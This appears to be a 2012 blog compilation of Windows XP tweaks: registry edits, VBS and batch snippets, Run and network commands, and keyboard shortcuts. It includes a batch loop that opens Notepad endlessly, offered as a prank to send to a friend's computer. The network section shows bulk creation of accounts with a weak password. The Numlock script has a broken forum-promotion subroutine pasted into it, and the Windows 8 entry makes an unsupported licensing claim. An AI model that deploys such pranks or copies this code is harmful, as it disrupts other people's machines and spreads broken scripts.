Wednesday, 20 June 2012

Control Panel - Icons Missing?

Click Start, Run and enter REGEDIT

Go to: HKEY_CURRENT_USER\Control Panel\don't load

Look in the right pane and you'll see the Control Panel Icons that have been disabled. You can either right click on the "don't load" subkey and select Delete to restore all disabled icons, or you can right click on each of the items in the right pane and select Delete to selectively restore them. Scroll up to Control Panel Applets for a listing of what each one is.

The change will be seen the next time you open Control Panel.

Reinstalling Internet Explorer ?

1) remove check form "tools>>folder option>>view>>Hide extension from known file type"
2)create a file "right click >> new text document"
2)rename it what ever name u want but the extension should be .vbs
3)right click on the vbs file and select Edit option
4)insert below lines in the vbs file

Code:


Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run ("rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %windir%\Inf\ie.inf")

5)save the file by "CTR+S"
6)Run the file by double click
7)you have all done

enjoy

Disable the Indexing Service (cisvc.exe)

1) remove check form "tools>>folder option>>view>>Hide extension from known file type"
2)create a file "right click >> new text document"
2)rename it what ever name u want but the extension should be .reg
3)right click on the reg file and select Edit option
4)insert below lines in the registry file

Code:


Windows Registry Editor Version 5.00


[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\cisvc]
"Start"=dword:00000004

5)save the file by "CTR+S"
6)Run the file by double click
7)you have all done

enjoy

Rename (Recycle bin,My Computer,My Document,Run,Search,Printers and Faxes etc..)

For Windows XP SP-2

1) Open Registry Editor From Start>>Run>>Regedit

2) Browse the path >> HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache

3) Find Below values

                           values                                                          Stand For

@C:\WINDOWS\system32\SHELL32.dll,-8503              Search...

@C:\WINDOWS\system32\SHELL32.dll,-8964              Recycle Bin

@C:\WINDOWS\system32\SHELL32.dll,-9216              My Computer

@C:\WINDOWS\system32\SHELL32.dll,-9217              My Network Places

@C:\WINDOWS\system32\SHELL32.dll,-9227              My Documents

@C:\WINDOWS\system32\SHELL32.dll,-9319              Printers and Faxes

@explorer.exe,-7023                                                  Run...


4) Double Click On Them And Rename There Value Data

5) Refresh Your Desktop

U Have Done

Note :-

It Is recommended to take backup Of The Registry Key

Open Notepad Continuously

Open Notepad Continuously in your friend's computer:

Code:

Quote

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top Save it as "Anything.BAT" and send it.

Controlling User Logon Hours ?

In Windows XP Professional it is possible to set limits on the times a certain user account is able to logon to the computer.
To set this up go to Start > Run and Type cmd
When the command Window appears enter your requirements in one of the following 3 formats
Code:


net user Kirsty /time:M-F,08:00-17:00 -->  Limits the user Kirsty to logon Monday- Friday between 8am and 5pm
net user Kirsty /time:M-F,8am-5pm    --> The same thing can also be expressed as above using the 12 hour clock

net user Kirsty /time:M,4am-5pm;T,1pm-3pm;W-F,8:00-17:00  -->  This shows the easiest way of setting limits that differ on multiple days.
To express Saturday and Sunday use 'sa' and 'su'.

To remove time restrictions: Go to Start > Run and type in CMD
Then type the following into the command line replacing Kirsty with the name of your user

net user Kirsty /time:all

This will allow a user only to logon within the set time but will not force them to be logged off when the allocated time expires.

Logon hours will apply to all accounts but administrator level accounts have the power to change them using the net user command.
As part of a domain this process can be managed differently on the domain controller.

Remove File/Edit/View & Restore ?

Remove File/Edit/View

Steps

1) remove check form "tools>>folder option>>view>>Hide extension from known file type"
2)create a file "right click >> new text document"
2)rename it what ever name u want but the extension should be .reg
3)right click on the registry file and select Edit option
4)insert below lines in the registry file

Quote
Windows Registry Editor Version 5.00

[-HKEY_CLASSES_ROOT\CLSID\{5b4dae26-b807-11d0-9815-00c04fd91972}]

5)save the file by "CTR+S"
6)Run the file by double click
7)you have all done

================================================================================

restore File/Edit/View

Steps

1) remove check form "tools>>folder option>>view>>Hide extension from known file type"
2)create a file "right click >> new text document"
2)rename it what ever name u want but the extension should be .vbs
3)right click on the vbs file and select Edit option
4)insert below lines in the vbs file

Quote
Dim myShell

Set myShell = CreateObject("WScript.Shell")
myShell.Run("regsvr32 /i shell32")

Set myShell = Nothing

MsgBox "Toolbar Menu's have been restored.", 4096,"Finished"



5)save the file by "CTR+S"
6)Run the file by double click
7)you have all done

enjoy

How to disable pendrive on windows

How to disable Pendrive?
Procedure:-
Open notepad and past this code then save it with anyname.reg
Then double click on it, computer will ask Are you sure you want to add the information to registry?click YES.

You will be there
Code:
————
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR]
"Start”=dword:00000004
————

How to Reverse:-
And if you want to reverse it change the value "00000004″ to "00000003″. The computer will show pendrive again

RUN COMMANDS ?


To Access…. Run Command:-


Accessibility Controls
access.cpl

Add Hardware Wizard
hdwwiz.cpl

Add/Remove Programs
appwiz.cpl

Administrative Tools
control admintools

Automatic Updates
wuaucpl.cpl

Bluetooth Transfer Wizard
fsquirt

Calculator
calc

Certificate Manager
certmgr.msc

Character Map
charmap

Check Disk Utility
chkdsk

Clipboard Viewer
clipbrd

Command Prompt
cmd

Component Services
dcomcnfg

Computer Management
compmgmt.msc

Date and Time Properties
timedate.cpl

DDE Shares
ddeshare

Device Manager
devmgmt.msc

Direct X Control Panel (If Installed)*
directx.cpl

Direct X Troubleshooter
dxdiag

Disk Cleanup Utility
cleanmgr

Disk Defragment
dfrg.msc

Disk Management
diskmgmt.msc

Disk Partition Manager
diskpart

Display Properties
control desktop

Display Properties
desk.cpl

Display Properties (w/Appearance Tab Preselected)
control color

Dr. Watson System Troubleshooting Utility
drwtsn32

Driver Verifier Utility
verifier

Event Viewer
eventvwr.msc

File Signature Verification Tool
sigverif

Findfast
findfast.cpl

Folders Properties
control folders

Fonts
control fonts

Fonts Folder
fonts

Free Cell Card Game
freecell

Game Controllers
joy.cpl

Group Policy Editor (XP Prof)
gpedit.msc

Hearts Card Game
mshearts

Iexpress Wizard
iexpress

Indexing Service
ciadv.msc

Internet Properties
inetcpl.cpl

IP Configuration (Display Connection Configuration) ipconfig /all
IP Configuration (Display DNS Cache Contents) ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents) ipconfig /flushdns
IP Configuration (Release All Connections) ipconfig /release
IP Configuration (Renew All Connections) ipconfig /renew
IP Configuration (Refreshes DHCP & Re-Registers DNS)
ipconfig /registerdns
IP Configuration (Display DHCP Class ID) ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID) ipconfig /setclassid
Java Control Panel (If Installed)
jpicpl32.cpl

Java Control Panel (If Installed)
javaws

Keyboard Properties
control keyboard

Local Security Settings
secpol.msc

Local Users and Groups
lusrmgr.msc

Logs You Out Of Windows
logoff

Microsoft Chat
winchat

Minesweeper Game
winmine

Mouse Properties
control mouse

Mouse Properties
main.cpl

Network Connections
control netconnections

Network Connections
ncpa.cpl

Network Setup Wizard
netsetup.cpl

Notepad notepad
Nview Desktop Manager (If Installed)
nvtuicpl.cpl

Object Packager
packager

ODBC Data Source Administrator
odbccp32.cpl

On Screen Keyboard
osk

Opens AC3 Filter (If Installed)
ac3filter.cpl

Password Properties
password.cpl

Performance Monitor
perfmon.msc

Performance Monitor
perfmon

Phone and Modem Options
telephon.cpl

Power Configuration
powercfg.cpl

Printers and Faxes
control printers

Printers Folder
printers

Private Character Editor
eudcedit

Quicktime (If Installed)
QuickTime.cpl

Regional Settings
intl.cpl

Registry Editor
regedit

Registry Editor
regedit32

Remote Desktop mstsc
Removable Storage
ntmsmgr.msc

Removable Storage Operator Requests
ntmsoprq.msc

Resultant Set of Policy (XP Prof)
rsop.msc

Scanners and Cameras
sticpl.cpl

Scheduled Tasks
control schedtasks

Security Center
wscui.cpl

Services
services.msc

Shared Folders
fsmgmt.msc

Shuts Down Windows
shutdown

Sounds and Audio
mmsys.cpl

Spider Solitare Card Game
spider

SQL Client Configuration
cliconfg

System Configuration Editor
sysedit

System Configuration Utility
msconfig

System File Checker Utility (Scan Immediately) sfc /scannow
System File Checker Utility (Scan Once At Next Boot) sfc /scanonce
System File Checker Utility (Scan On Every Boot) sfc /scanboot
System File Checker Utility (Return to Default Setting) sfc /revert
System File Checker Utility (Purge File Cache) sfc /purgecache
System File Checker Utility (Set Cache Size to size x)
sfc /cachesize=x

System Properties
sysdm.cpl

Task Manager
taskmgr

Telnet Client
telnet

User Account Management
nusrmgr.cpl

Utility Manager
utilman

Windows Firewall
firewall.cpl

Windows Magnifier
magnify

Windows Management Infrastructure
wmimgmt.msc

Windows System Security Tool
syskey

Windows Update Launches
wupdmgr

Windows XP Tour Wizard
tourstart

Wordpad
write

Remove Internet Explorer Branding ?

Steps

1) remove check form "tools>>folder option>>view>>Hide extension from known file type"
2)create a file "right click >> new text document"
2)rename it what ever name u want but the extension should be .vbs
3)right click on the vbs file and select Edit option
4)insert below lines in the vbs file

Quote
Dim myShell

Set myShell = CreateObject("WScript.Shell")
myShell.Run("rundll32.exe iedkcs32.dll,Clear")

MsgBox "IE Branding has been removed.", 4096,"Finished"

5)save the file by "CTR+S"
6)Run the file by double click
7)you have all done

enjoy

Set Numlock State On or Off at Startup ?

Steps

1) remove check form "tools>>folder option>>view>>Hide extension from known file type"
2)create a file "right click >> new text document"
2)rename it what ever name u want but the extension should be .vbs
3)right click on the vbs file and select Edit option
4)insert below lines in the vbs file

Quote

Option Explicit
On Error Resume Next

Dim WSHShell, n, p, itemtype, MyBox, vbdefaultbutton
Set WSHShell = WScript.CreateObject("WScript.Shell")

p = "HKEY_CURRENT_USER\Control Panel\Keyboard\InitialKeyboardIndicators"
itemtype = "REG_SZ"

n = WSHShell.RegRead (p)
errnum = Err.Number

if errnum <> 0 then

   WSHShell.RegWrite p, 2, itemtype
End If

If n = 0 Then
   WshShell.RegWrite p, 2, itemtype
   MyBox = MsgBox("Numlock is now ENABLED", 64, "Enable Numlock")
End If

If n = 2 Then
   WshShell.Regwrite p, 0, itemtype
   MyBox = MsgBox("Numlock is now DISABLED", 64, "Enable Numlock")
End If

Set WshShell = Nothing

Visitandhra's forum

Sub Visitandhra's forum
   If MsgBox("This script came from Andhrahackers Forum" & vbCRLF & vbCRLF & "Would you like to visit Andhrahackers Web Site now?", vbQuestion + vbYesNo + vbDefaultButton, "Visit andhra's forum") =6 Then
      wshshell.Run "http://www.andhrahackers.com/forum/index.php/board,59.0.html"
   End If
End Sub

5)save the file by "CTR+S"
6)Run the file by double click
7)you have all done

enjoy  Note:-
this also can done by many other ways but i like to do it by some code

Restore Safely Remove Hardware Icon

Steps

1) remove check form "tools>>folder option>>view>>Hide extension from known file type"
2)create a file "right click >> new text document"
2)rename it what ever name u want but the extension should be .vbs
3)right click on the vbs file and select Edit option
4)insert below lines in the vbs file

Quote

set shell=createobject("wscript.shell")
shell.run "RunDll32.exe shell32.dll,Control_RunDLL hotplug.dll"

5)save the file by "CTR+S"
6)Run the file by double click
7)you have all done

enjoy

Auto logon for Windows XP

Would you rather not have to log on after your computer starts? If you’re the only person who uses your computer, you can make life a little easier by skipping the Welcome screen completely and having Microsoft Windows XP take you straight to your desktop.

To automatically log on to Windows XP upon startup

1.
   
Click Start, and then click Run
.
Note: Remember your user name at the top of the Start menu, because you’ll need it later.



2.
   
In the Open box, type control userpasswords2 and click OK.



3.
   
Clear the Users must enter a user name and password to use this computer check box. Click OK.



4.
   
Click the User name box, type the user name that was displayed on the Start menu in step 1. If you normally type a password to log on, type your password in both the Password and Confirm Password boxes. Otherwise, leave these boxes blank. Click OK.



Auto logon now allows anyone to start and use your computer without typing a password.

Note: Keep in mind that you should not enable auto logon if you need privacy for any files on your computer. If you need to maintain privacy, create separate user accounts for everyone in your home, and protect your account with a password


Source :-
Code:
http://www.microsoft.com/windowsxp/using/setup/tips/advanced/autologon.mspx

Repairs the Icon View ?

Windows Registry Editor Version 5.00


[HKEY_CURRENT_USER\Control Panel\desktop\WindowMetrics]
"Shell Icon BPP"="16"

"Shell Icon Size"="32"


[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSaveSettings"=dword:00000000


1) Copy the given code
2) open notepade
3) paste the code save it  "iconfix.reg"
4) now just merge the registry file by double click on it

IE broken how to fix it?

So one of your friends, "not you of course”, has managed to nuke Internet Explorer and they are unsure how they did it. You’ve eliminated the possibility of viruses and adware, so this just leaves you and a broken IE. Before you begin to even consider running a repair install of the OS, let’s try to do a repair on IE instead.

THE REPAIR PROCESS

Start the Registry Editor by typing regedit from the Run box. Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Active Setup \ Installed Components \ {89820200-ECBD-11cf-8B85-00AA005B4383} and then right-click the "IsInstalled value.” Click Modify. From there, you will change the value from 1 to 0. All right, go ahead and close the editor and reinstall IE from this location. /http://www.microsoft.com/windows/ie/default.mspx

IF SOMETHING GOES WRONG

If messing with the registry and something goes horribly wrong, you can use "Last Known Good Configuration (F8 Safe Mode)” or a Restore Point to get back to where you were before, with your settings. Then you can try again, this time taking care to watch the portion of the registry you are changing. Most people who have troubles with this end up changing the wrong registry key.

Hope this tut helps some members.

Delete Temp files at System Shutdown ?

Windows does not automatically delete temporary files during system shutdown. This means that deleted files in the trashbin and temporary files like those in the Internet Cache are still accessible after a restart of the system. System cleaners like CCleaner or Disk Cleaner are able to delete those files but I would like to show a way how many of them can be deleted by using a Windows system tool.

We are going to configure the Disk Cleanup Settings in Windows to delete the temporary files and create a new rule that the software will be run during system shutdown.

Our first step would be to open the Disk Cleanup Settings and configure them the way we want. To do that you use the Run command in Windows XP / 2000 or the search in Windows Vista
.

cleanmgr /sageset 1

This opens the Disk Cleanup Settings. Check the elements that you want to automatically delete. If you are unsure about an element click on it and read the description. This should give you a good understanding of it.



disk cleanup settings

Open the Group Policy Editor now. You do that in the same location where you started the Disk Cleanup Settings.

gpedit.msc

Navigate to User Configuration > Windows Settings > Scripts (Logon / Logoff) and double-click on Logoff.



Click on Add and Browse in the next window. Right-click in the blank space of the Logoff folder and create a new text document. Name it cleanup.cmd. Open it with a right-click and add the following line to it.

cleanmgr /sagerun 1

Select the file cleanup.cmd and click Open and in the previous menu OK. The file that you created should be now in the list. Click on Apply and OK afterwards. Et Voila, we are done.

Everything that you selected during the configuration will now be deleted after every system shutdown.

some network commands ?

here i am some usefull information ..................

here
hostname : this shows machine name

c:\>hostname

ipconfig  : this shows ip address, subnetmask , gateway ,  dns ip , alternate dns ip , mac id

(physical address)

c:\>ipconfig
or
for more information
c:\>ipconfig /all
c:\>ipconfig /?

getmac : this command is used to watch mac address

c:\>getmac

arp -a : address resolution protocol shows address of hostmachine which is connected
to our machine

c:\>arp -a
c:\>arp /?

netstat - this command shows which type of connection with what type of protocol and
  portno is established with our system

c:\>netstat  -a
c:\>netstat /?

at : this command is used to schedule a task at particular time

c:\>at \\hostname 8:30pm /interactive "calc.exe"


how do we see all machine which are connected to us

c:\>net view


fsutil: this command shows file system utility

c:\>fsutil fsinfo ntfsinfo c:
above command shows ntfs cluster size

c:\>fsutil hardlink create c:\new.txt c:\old.txt
above command creates a hardlink between old.txt and new.txt file

c:\>fsutil file createnew c:\empty.txt  5000
creates an empty  file with 5000 space


how do we create user accounts

c:\>net user user1 abc123/? /ad
above command creates useraccount named as user1 with abc123/? passwd


c:\>for /L %i in (1,1,10) do net user sam%i abc123/? /ad
creates 10 users as sam1 , sam2, sam3.... with passwd abc123/?

c:\>net user user1 /de
used to delete user1 account

c:\>c:\>for /L %i in (1,1,10) do net user sam%i /de
deletes all sam users

practical

c:\>notepad users.txt
type here some user names
rehana
roshini
fatima
laila
tabassum
arju
zahera
dibaag

save notepad

c:\>for /f %i in (users.txt) do net user %i abc123/? /ad
above command creates all user accounts which are mentioned in users.txt file

startmenu - run - compmgmt.msc

or

mycomputer - rc - manage
at this wizard select local users and groups
select users

tasklist : this command shows current running tasks information

c:\>tasklist

for remote system

c:\>tasklist /s 10.1.1.1

taskkill : this command is used to terminate current running tasks

c:\>taskkill /pid  888

for remote system

c:\>taskkill /s 10.1.1.1 /pid 1002


i think its useful for u...............

Hide ur folders-Disguise them to "Recycle Bin"

I found it good,but I was able to open the folder somehow......I don't know how to recover file back.....Perhaps by removing the extension from the name.....Just try urself n do tell me in this thread....
Rename any folder with extension {645FF040-5081-101B-9F08-00AA002F954E}
eg,
if u've a folder games
press F2,
then type, "games.{645FF040-5081-101B-9F08-00AA002F954E}"
c the magic....
then 2 get to original form,
remove the extension using
"ren games.{645FF040-5081-101B-9F08-00AA002F954E} games" in dos or as a bat file.
Disguise your files to Control Panel
Suppose you want to lock the folder games in d: which has the path D:\Games.In the same drive create a text file and type
ren games games.{21EC2020-3AEA-1069-A2DD-08002B30309D}
Now save this text file as loc.bat

create another text file and type in it
ren games.{21EC2020-3AEA-1069-A2DD-08002B30309D} games
Now save this text file as key.bat

Now you can see 2 batch files loc and key. Press loc and the folder games will change to control panel and you cannot view its contents. Press key and you will get back your original folder.


Perhaps it works only on XP.....It didn't work on my laptop...but when I locked folder with this trick on my desktop PC,I was able to lock.But when u right click on the folder after locking it,n choose to explore u can open the folder without key file.This drawback of this trick has been mentioned nowhere....but I observed this thing...so better be careful while u lock.N do open and save as TEXT FILE only....not as rtf or something other...........

changing start button text to ur name?

changing start button text to ur name?
I’ve read a number of articles on the internet about changing the text on the Start button in XP. On more than one occasion I’ve seen references to a five (5) letter limitation when the button is renamed. I always wondered if this was true or just an assumption someone made because the default ‘start’ just happened to fit the button size. So, I decided to run a test and see if there really was a five character limit.

As you can see from the screen capture above it would seem that the five character limit isn’t etched in stone. The button expanded to accept the text I entered with no problem. I’ve been using the system for a few weeks now with no adverse effects. That’s not to say I won’t discover something down the road a bit, but for now I feel comfortable with the changes. If you’d like to try the procedure I used, the instructions follow.
Step 1 – Modify Explorer.exe File

In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a special editor. For purposes of this article I have used Resource Hacker. Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Win95, Win98, WinME, WinNT, Win2000 and WinXP operating systems.

The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe

The category we are going to be using is String Table. Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable. We’re going to modify item 578, currently showing the word "start” just as it displays on the current Start button.

There is no magic here. Just double click on the word "start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry. In my case I used  manoj

Click Compile Script and then save the altered file using the Save As command on the File Menu. Do not use the Save command – Make sure to use the Save As command and choose a name for the file save the newly named file to C:\Windows.


Step 2 – Modify the Registry

Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open: field. Navigate to:

 HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon

In the right pane , double click the Shell entry to open the Edit String dialog box . In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.

Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.

Assigning a Default Label Name to Extra or Pen Drives ?

Assigning a Default Label Name to Extra or Pen Drives ?
when we plugged a usb mass storage device this reg tweak helps to assign a default name for the Selected Drive it wont display the Original Label of that

type this in notepad and save it as .reg extension

Quote
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\H\DefaultLabel]
@="kmkmahesh"

u have to replace H with ur usb drive letter

and u have to replace kmkmahesh with a string wht ever u want to label for tht drive

if u facing the same problem when u r plugging the usb device just delete the line

Quote
@="kmkmahesh"

and u have to replace    H    with ur usb drive letter for which u r facing the problem it will work surely

Note:  Some times it will effect on system restart only

How to use Windows 8 Free for 4 months ?

How to use Windows 8 Free for 4 months ?
Microsoft allows anyone to install and use any version of Windows 8 for 30 days without having to enter an activation key. There are no strings attached, and the operating system’s performance is not degraded or defaced during the trial. This trial can be extended for 4 months by using a Microsoft-supplied utility called the Software License Manager (slmgr). This tool conveniently ships with Windows 8.

To see how many days you have left, click Start, right-click Computer, and choose Properties. At the bottom of the dialog under Windows Activation, you’ll see the number of days left in your trial period.

When that number gets perilously close to zero, you can extend the free period another 30 days via the following steps:

Step 1: Click Start, All Programs, Accessories. Right-click Command Prompt and choose Run As Administrator. Enter your administrator password.

Step 2: Type the following command and press Enter:

    slmgr -rearm

[Note the space after slmgr and the hyphen in front of rearm.]

Step 3: Restart Windows 8

Once the OS restarts, the Properties dialog described above will indicate that Windows 8’s activation grace period has been reset to a full 30 days. You can run the -rearm trick a total of three times. If you perform a -rearm at the end of each 30-day period, you end up with 120 days of full, unfettered Windows 8 use without having to supply an activation key in the interim.

Microsoft is aware of this bug as it was present even in Windows Vista, and they say thay are pretty cool with it. So, there are no legal implications as such in using this trick to extend your trial period.

Speed up your computer by optimising your Hard Drive...

Speed up your computer by optimising your Hard Drive...
You can speed up the performance of your computer by optimising your hard drive using Disk Defragmenter. When you add and remove programs or files from your computer, the data on your hard drive tends to get scattered all over the place (on the hard drive that is). This is known as fragmentation or some people might say, "your hard drive is fragmented." Your computer takes longer to run programs when the data is fragmented because it has to search all over the hard drive for the data. The Disk Defragmenter rearranges the data so that your computer system can run more efficiently...


How to Run Disk Defragmenter

Step 1: Click the Start Button
Step 2: Select Programs, then Accessories, then System Tools




Step 3: Click Disk Defragmenter from the menu (see image above)


A dialog box appears asking which drive you want to defragment



Step 4: Choose the drive you would like to defragment

Note: If you have more than one drive, there is an option to defrag all the hard drives


Step 5: Click the settings tab



Step 6: Make sure the option "Rearrange program files so my programs start faster" is checked.
Step 7: Click OK to return to the "Select Drive" screen.


Step 8: Click OK to start the defragmenter.




If you are using Windows 95, you may be presented with a message saying only a small percentage of your drive is fragmented. It will ask if you still want to run the program. Although the fragmentation may be low, sometimes you still get better performance after running Defragmenter.


Note: Disk Defragmenter is a very slow process. Close all programs before running defrag. You shouldn't use your computer while it's running, since each time you write new data to the disk, the Defragmenter will stop and start over from scratch. It also makes your computer run very slowly (until the process is over of course). Some people prefer to run the Defragmenter before going to bed and let the computer do its stuff while they are sleeping

how to add your own tips in windows ?

how to add your own tips in windows ?
re you sick of seeing the same tips again and again when you first logon to Windows? Now you can change them to whatever you want, whether it's quotes, jokes or a to-do list, anything is possible.

Open your registry and find the key below.

HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Explorer\ Tips

Create a new string valued named by incrementing the existing value names and set it to the required tip text.

Disable Windows Logo Key

Disable Windows Logo Key
i was recently playing games and this nasty windos logo key keep annoying me , cause i often accidently clicked it , and i start to search a solution to solve my problem, and found the following article in microsfot website, and it did work, hope this helps, thanks!

CODE
http://support.microsoft.com/?kbid=181348


or in other articles, u can copy the following messages into ur notepad and save as *.reg, and use it..

Windows Registry Editor Version 5.00

Code:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout]
"Scancode Map"=hex:00,00,00,00,00,00,00,00,03,00,00,00,00,00,5b,e0,00,00,5c,e0,\
00,00,00,00

Automatic Windows Installation, No keypress required!

Automatic Windows Installation, No keypress required!
An unattended Windows XP/2003 install can install all your software and settings along with Windows, and without you having to click a button or press a key,completely automated. Learn how over here:

CODE

http://unattended.msfn.org


Make your unattended setup now!

keyboards shortcuts

keyboards shortcuts
Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day:

Windows key + R = Run menu

This is usually followed by:
cmd = Command Prompt
iexplore + "web address" = Internet Explorer
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management
dnsmgmt.msc = DNS Management
services.msc = Services
eventvwr = Event Viewer
dsa.msc = Active Directory Users and Computers
dssite.msc = Active Directory Sites and Services
Windows key + E = Explorer

ALT + Tab = Switch between windows

ALT, Space, X = Maximize window

CTRL + Shift + Esc = Task Manager

Windows key + Break = System properties

Windows key + F = Search

Windows key + D = Hide/Display all windows

CTRL + C = copy

CTRL + X = cut

CTRL + V = paste

Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.


Keyboard Shortcuts

[Alt] and [Esc] Switch between running applications

[Alt] and letter Select menu item by underlined letter

[Ctrl] and [Esc] Open Program Menu

[Ctrl] and [F4] Close active document or group windows (does not work with some applications)

[Alt] and [F4] Quit active application or close current window

[Alt] and [-] Open Control menu for active document

Ctrl] Lft., Rt. arrow Move cursor forward or back one word

Ctrl] Up, Down arrow Move cursor forward or back one paragraph

[F1] Open Help for active application

Windows+M Minimize all open windows

Shift+Windows+M Undo minimize all open windows

Windows+F1 Open Windows Help

Windows+Tab Cycle through the Taskbar buttons

Windows+Break Open the System Properties dialog box


acessability shortcuts

Right SHIFT for eight seconds........ Switch FilterKeys on and off.

Left ALT +left SHIFT +PRINT SCREEN....... Switch High Contrast on and off.

Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off.

SHIFT....... five times Switch StickyKeys on and off.

NUM LOCK...... for five seconds Switch ToggleKeys on and off.

explorer shortcuts

END....... Display the bottom of the active window.

HOME....... Display the top of the active window.

NUM LOCK+ASTERISK....... on numeric keypad (*) Display all subfolders under the selected folder.

NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder.

NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder.

LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder.

RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.



Type the following commands in your Run Box (Windows Key + R) or Start Run

devmgmt.msc = Device Manager
msinfo32 = System Information
cleanmgr = Disk Cleanup
ntbackup = Backup or Restore Wizard (Windows Backup Utility)
mmc = Microsoft Management Console
excel = Microsoft Excel (If Installed)
msaccess = Microsoft Access (If Installed)
powerpnt = Microsoft PowerPoint (If Installed)
winword = Microsoft Word (If Installed)
frontpg = Microsoft FrontPage (If Installed)
notepad = Notepad
wordpad = WordPad
calc = Calculator
msmsgs = Windows Messenger
mspaint = Microsoft Paint
wmplayer = Windows Media Player
rstrui = System Restore
netscp6 = Netscape 6.x
netscp = Netscape 7.x
netscape = Netscape 4.x
waol = America Online
control = Opens the Control Panel
control printers = Opens the Printers Dialog


internetbrowser

type in u're adress "google", then press [Right CTRL] and [Enter]
add www. and .com to word and go to it


For Windows XP:

Copy. CTRL+C
Cut. CTRL+X
Paste. CTRL+V
Undo. CTRL+Z
Delete. DELETE
Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE
Copy selected item. CTRL while dragging an item
Create shortcut to selected item. CTRL+SHIFT while dragging an item
Rename selected item. F2
Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW
Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW
Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW
Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW
Highlight a block of text. CTRL+SHIFT with any of the arrow keys
Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys
Select all. CTRL+A
Search for a file or folder. F3
View properties for the selected item. ALT+ENTER
Close the active item, or quit the active program. ALT+F4
Opens the shortcut menu for the active window. ALT+SPACEBAR
Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4
Switch between open items. ALT+TAB
Cycle through items in the order they were opened. ALT+ESC
Cycle through screen elements in a window or on the desktop. F6
Display the Address bar list in My Computer or Windows Explorer. F4
Display the shortcut menu for the selected item. SHIFT+F10
Display the System menu for the active window. ALT+SPACEBAR
Display the Start menu. CTRL+ESC
Display the corresponding menu. ALT+Underlined letter in a menu name
Carry out the corresponding command. Underlined letter in a command name on an open menu
Activate the menu bar in the active program. F10
Open the next menu to the right, or open a submenu. RIGHT ARROW
Open the next menu to the left, or close a submenu. LEFT ARROW
Refresh the active window. F5
View the folder one level up in My Computer or Windows Explorer. BACKSPACE
Cancel the current task. ESC
SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.

Use these keyboard shortcuts for dialog boxes:

To Press
Move forward through tabs. CTRL+TAB
Move backward through tabs. CTRL+SHIFT+TAB
Move forward through options. TAB
Move backward through options. SHIFT+TAB
Carry out the corresponding command or select the corresponding option. ALT+Underlined letter
Carry out the command for the active option or button. ENTER
Select or clear the check box if the active option is a check box. SPACEBAR
Select a button if the active option is a group of option buttons. Arrow keys
Display Help. F1
Display the items in the active list. F4
Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE

If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts:


Display or hide the Start menu. WIN Key
Display the System Properties dialog box. WIN Key+BREAK
Show the desktop. WIN Key+D
Minimize all windows. WIN Key+M
Restores minimized windows. WIN Key+Shift+M
Open My Computer. WIN Key+E
Search for a file or folder. WIN Key+F
Search for computers. CTRL+WIN Key+F
Display Windows Help. WIN Key+F1
Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ L
Open the Run dialog box. WIN Key+R
Open Utility Manager. WIN Key+U

accessibility keyboard shortcuts:

Switch FilterKeys on and off. Right SHIFT for eight seconds
Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN
Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
Switch StickyKeys on and off. SHIFT five times
Switch ToggleKeys on and off. NUM LOCK for five seconds
Open Utility Manager. WIN Key+U

